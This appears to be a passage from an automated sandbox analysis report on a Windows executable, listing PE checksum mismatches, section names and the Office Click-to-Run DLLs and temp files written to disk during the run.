    Source: C2RINTL.tr-tr.dll.6.drStatic PE information: real checksum: 0x13070 should be: 0x1cb0e
    Source: C2RINTL.ru-ru.dll.6.drStatic PE information: real checksum: 0xe13c should be: 0x16472
    Source: C2RINTL.ms-my.dll.6.drStatic PE information: real checksum: 0x17809 should be: 0x19812
    Source: officesvcmgr.exe.6.drStatic PE information: real checksum: 0x44cef5 should be: 0x4523eb
    Source: C2RINTL.kk-kz.dll.6.drStatic PE information: real checksum: 0x14aab should be: 0x1db24
    Source: C2R64.dll.6.drStatic PE information: real checksum: 0x2879bf should be: 0x28a7f1
    Source: C2RINTL.bg-bg.dll.6.drStatic PE information: real checksum: 0x12398 should be: 0xfc1c
    Source: AppVFileSystemMetadata.dll.6.drStatic PE information: real checksum: 0x48f65 should be: 0x45cf8
    Source: policy.dll.6.drStatic PE information: real checksum: 0x17d7a3 should be: 0x17a611
    Source: AppVIsvSubsystemController.dll.6.drStatic PE information: real checksum: 0xf4a9c should be: 0xfbacc
    Source: AppVManifest.dll.6.drStatic PE information: real checksum: 0xe9928 should be: 0xf48c7
    Source: OfficeC2RCom.dll.6.drStatic PE information: real checksum: 0x266ca7 should be: 0x26af37
    Source: C2RINTL.it-it.dll.6.drStatic PE information: real checksum: 0xecc8 should be: 0x19379
    Source: C2RINTL.zh-tw.dll.6.drStatic PE information: real checksum: 0x18567 should be: 0x1078e
    Source: C2RINTL.nb-no.dll.6.drStatic PE information: real checksum: 0x1bd67 should be: 0x1b610
    Source: C2RINTL.fi-fi.dll.6.drStatic PE information: real checksum: 0xfa2f should be: 0x10dae
    Source: ApiClient.dll.6.drStatic PE information: real checksum: 0x89d72 should be: 0x85267
    Source: C2RINTL.sl-si.dll.6.drStatic PE information: real checksum: 0x13b1d should be: 0x1031f
    Source: c2r64werhandler.dll.6.drStatic PE information: real checksum: 0x2cf8c should be: 0x327e2
    Source: C2RINTL.es-mx.dll.6.drStatic PE information: real checksum: 0x17eb7 should be: 0x143a8
    Source: AppVPolicy.dll.6.drStatic PE information: real checksum: 0x10ab85 should be: 0x1038e0
    Source: C2RINTL.lt-lt.dll.6.drStatic PE information: real checksum: 0xf38f should be: 0xea98
    Source: C2RINTL.zh-cn.dll.6.drStatic PE information: real checksum: 0xcea1 should be: 0x1a4b9
    Source: C2RINTL.th-th.dll.6.drStatic PE information: real checksum: 0x16003 should be: 0x1134a
    Source: C2RINTL.ar-sa.dll.6.drStatic PE information: real checksum: 0x13b6a should be: 0x19121
    Source: C2RINTL.fr-ca.dll.6.drStatic PE information: real checksum: 0x1a08c should be: 0x141ce
    Source: C2RINTL.et-ee.dll.6.drStatic PE information: real checksum: 0x10db1 should be: 0x152d4
    Source: AppVIsvStreamingManager.dll.6.drStatic PE information: real checksum: 0x2e958 should be: 0x327bb
    Source: C2RINTL.es-es.dll.6.drStatic PE information: real checksum: 0x123de should be: 0xfe13
    Source: C2RINTL.hu-hu.dll.6.drStatic PE information: real checksum: 0xfb55 should be: 0x1bd40
    Source: C2RINTL.sv-se.dll.6.drStatic PE information: real checksum: 0x12b2e should be: 0x19a2a
    Source: C2RINTL.he-il.dll.6.drStatic PE information: real checksum: 0xf3bc should be: 0x10076
    Source: C2RINTL.hr-hr.dll.6.drStatic PE information: real checksum: 0x106ad should be: 0x168e5
    Source: AppVIntegration.dll.6.drStatic PE information: real checksum: 0x1974c6 should be: 0x190a3e
    Source: C2RINTL.id-id.dll.6.drStatic PE information: real checksum: 0x150f1 should be: 0x1a39a
    Source: AppVIsvVirtualization.dll.6.drStatic PE information: real checksum: 0x81827 should be: 0x76f52
    Source: C2RUI.dll.6.drStatic PE information: real checksum: 0x2f61cc should be: 0x2ec53e
    Source: C2RINTL.vi-vn.dll.6.drStatic PE information: real checksum: 0x13391 should be: 0x11a17
    Source: MavInject32.exe.6.drStatic PE information: real checksum: 0x34c87 should be: 0x31faf
    Source: 872C.tmp.0.drStatic PE information: real checksum: 0x73de83 should be: 0x742ac6
    Source: c2r32werhandler.dll.6.drStatic PE information: real checksum: 0x28609 should be: 0x1de5f
    Source: OfficeOEMPlugin.dll.6.drStatic PE information: real checksum: 0x26ed7 should be: 0x29a59
    Source: C2RINTL.pt-br.dll.6.drStatic PE information: real checksum: 0x138b4 should be: 0x13f50
    Source: C2RINTL.ro-ro.dll.6.drStatic PE information: real checksum: 0x1dedb should be: 0x1417d
    Source: sBvrNv0wtb.exeStatic PE information: section name: .xdata
    Source: 872C.tmp.0.drStatic PE information: section name: .fptable
    Source: 918D.tmp.0.drStatic PE information: section name: .xdata
    Source: C2RUI.dll.6.drStatic PE information: section name: .didat
    Source: IntegratedOffice.exe.6.drStatic PE information: section name: .didat
    Source: IntegratedOffice.exe.6.drStatic PE information: section name: .fptable
    Source: inventory.dll.6.drStatic PE information: section name: .didat
    Source: inventory.dll.6.drStatic PE information: section name: .detourc
    Source: manageability.dll.6.drStatic PE information: section name: .didat
    Source: MavInject32.exe.6.drStatic PE information: section name: .detourc
    Source: msix.dll.6.drStatic PE information: section name: .didat
    Source: msix.dll.6.drStatic PE information: section name: .fptable
    Source: OfficeC2RClient.exe.6.drStatic PE information: section name: .didat
    Source: OfficeC2RClient.exe.6.drStatic PE information: section name: .detourc
    Source: OfficeC2RCom.dll.6.drStatic PE information: section name: .didat
    Source: OfficeC2RCom.dll.6.drStatic PE information: section name: .fptable
    Source: OfficeClickToRun.exe.6.drStatic PE information: section name: .didat
    Source: officeinventory.dll.6.drStatic PE information: section name: _RDATA
    Source: OfficeOEMPlugin.dll.6.drStatic PE information: section name: .didat
    Source: officesvcmgr.exe.6.drStatic PE information: section name: .didat
    Source: policy.dll.6.drStatic PE information: section name: .didat
    Source: repoman.dll.6.drStatic PE information: section name: .didat
    Source: repoman.dll.6.drStatic PE information: section name: .fptable
    Source: vcruntime140.dll.6.drStatic PE information: section name: fothk
    Source: vcruntime140.dll.6.drStatic PE information: section name: _RDATA
    Source: ApiClient.dll.6.drStatic PE information: section name: .fptable
    Source: AppVCatalog.dll.6.drStatic PE information: section name: .didat
    Source: appvcleaner.exe.6.drStatic PE information: section name: .didat
    Source: AppVIntegration.dll.6.drStatic PE information: section name: .didat
    Source: AppVIsvApi.dll.6.drStatic PE information: section name: .didat
    Source: AppVIsvStreamingManager.dll.6.drStatic PE information: section name: .didat
    Source: AppVIsvSubsystemController.dll.6.drStatic PE information: section name: .didat
    Source: AppVIsvSubsystemController.dll.6.drStatic PE information: section name: .detourc
    Source: AppVIsvSubsystemController.dll.6.drStatic PE information: section name: .mrdata
    Source: AppvIsvSubsystems32.dll.6.drStatic PE information: section name: .mrdata
    Source: AppvIsvSubsystems32.dll.6.drStatic PE information: section name: .detourd
    Source: AppvIsvSubsystems32.dll.6.drStatic PE information: section name: .detourc
    Source: AppvIsvSubsystems32.dll.6.drStatic PE information: section name: .c2r
    Source: AppvIsvSubsystems64.dll.6.drStatic PE information: section name: .didat
    Source: AppvIsvSubsystems64.dll.6.drStatic PE information: section name: .detourc
    Source: AppvIsvSubsystems64.dll.6.drStatic PE information: section name: .mrdata
    Source: AppvIsvSubsystems64.dll.6.drStatic PE information: section name: .detourd
    Source: AppvIsvSubsystems64.dll.6.drStatic PE information: section name: .c2r
    Source: AppvIsvSubsystems64_arm64x.dll.6.drStatic PE information: section name: .hexpthk
    Source: AppvIsvSubsystems64_arm64x.dll.6.drStatic PE information: section name: .didat
    Source: AppvIsvSubsystems64_arm64x.dll.6.drStatic PE information: section name: .detourc
    Source: AppvIsvSubsystems64_arm64x.dll.6.drStatic PE information: section name: .mrdata
    Source: AppvIsvSubsystems64_arm64x.dll.6.drStatic PE information: section name: .detourd
    Source: AppvIsvSubsystems64_arm64x.dll.6.drStatic PE information: section name: .a64xrm
    Source: AppvIsvSubsystems64_arm64x.dll.6.drStatic PE information: section name: .c2r
    Source: AppVIsvVirtualization.dll.6.drStatic PE information: section name: .didat
    Source: AppVOrchestration.dll.6.drStatic PE information: section name: .didat
    Source: AppVScripting.dll.6.drStatic PE information: section name: .didat
    Source: AppVShNotify.exe.6.drStatic PE information: section name: .didat
    Source: C2R32.dll.6.drStatic PE information: section name: .fptable
    Source: C2R32.dll.6.drStatic PE information: section name: .detourc
    Source: c2r32werhandler.dll.6.drStatic PE information: section name: .fptable
    Source: C2R64.dll.6.drStatic PE information: section name: .didat
    Source: C2R64.dll.6.drStatic PE information: section name: .fptable
    Source: C2R64.dll.6.drStatic PE information: section name: .detourc
    Source: c2r64werhandler.dll.6.drStatic PE information: section name: .didat
    Source: c2r64werhandler.dll.6.drStatic PE information: section name: .fptable
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-synch-l1-2-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vcruntime140.dllJump to dropped file
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exeFile created: C:\Users\user\AppData\Local\Temp\872C.tmpJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVPolicy.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-processthreads-l1-1-1.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVManifest.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.zh-cn.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.hu-hu.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVShNotify.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVCatalog.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.nb-no.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-locale-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.en-us.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\MavInject32.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.el-gr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\ApiClient.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-file-l2-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVPolicy.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.sr-latn-rs.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sk-sk.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sv-se.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ApiClient.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvStreamingManager.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.he-il.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVManifest.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.bg-bg.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\repoman.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fi-fi.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RClient.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fr-ca.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ro-ro.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\officesvcmgr.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sl-si.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-process-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-conio-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.th-th.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\vcruntime140_1.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-filesystem-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.cs-cz.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-multibyte-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\repoman.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppvIsvSubsystems64.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems64.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ja-jp.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvVirtualization.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVOrchestration.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\manageability.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.he-il.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ro-ro.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.sl-si.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.kk-kz.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.id-id.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.es-es.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems64_arm64x.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officesvcmgr.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.fi-fi.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\policy.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.pl-pl.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.vi-vn.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\c2r64werhandler.dllJump to dropped file
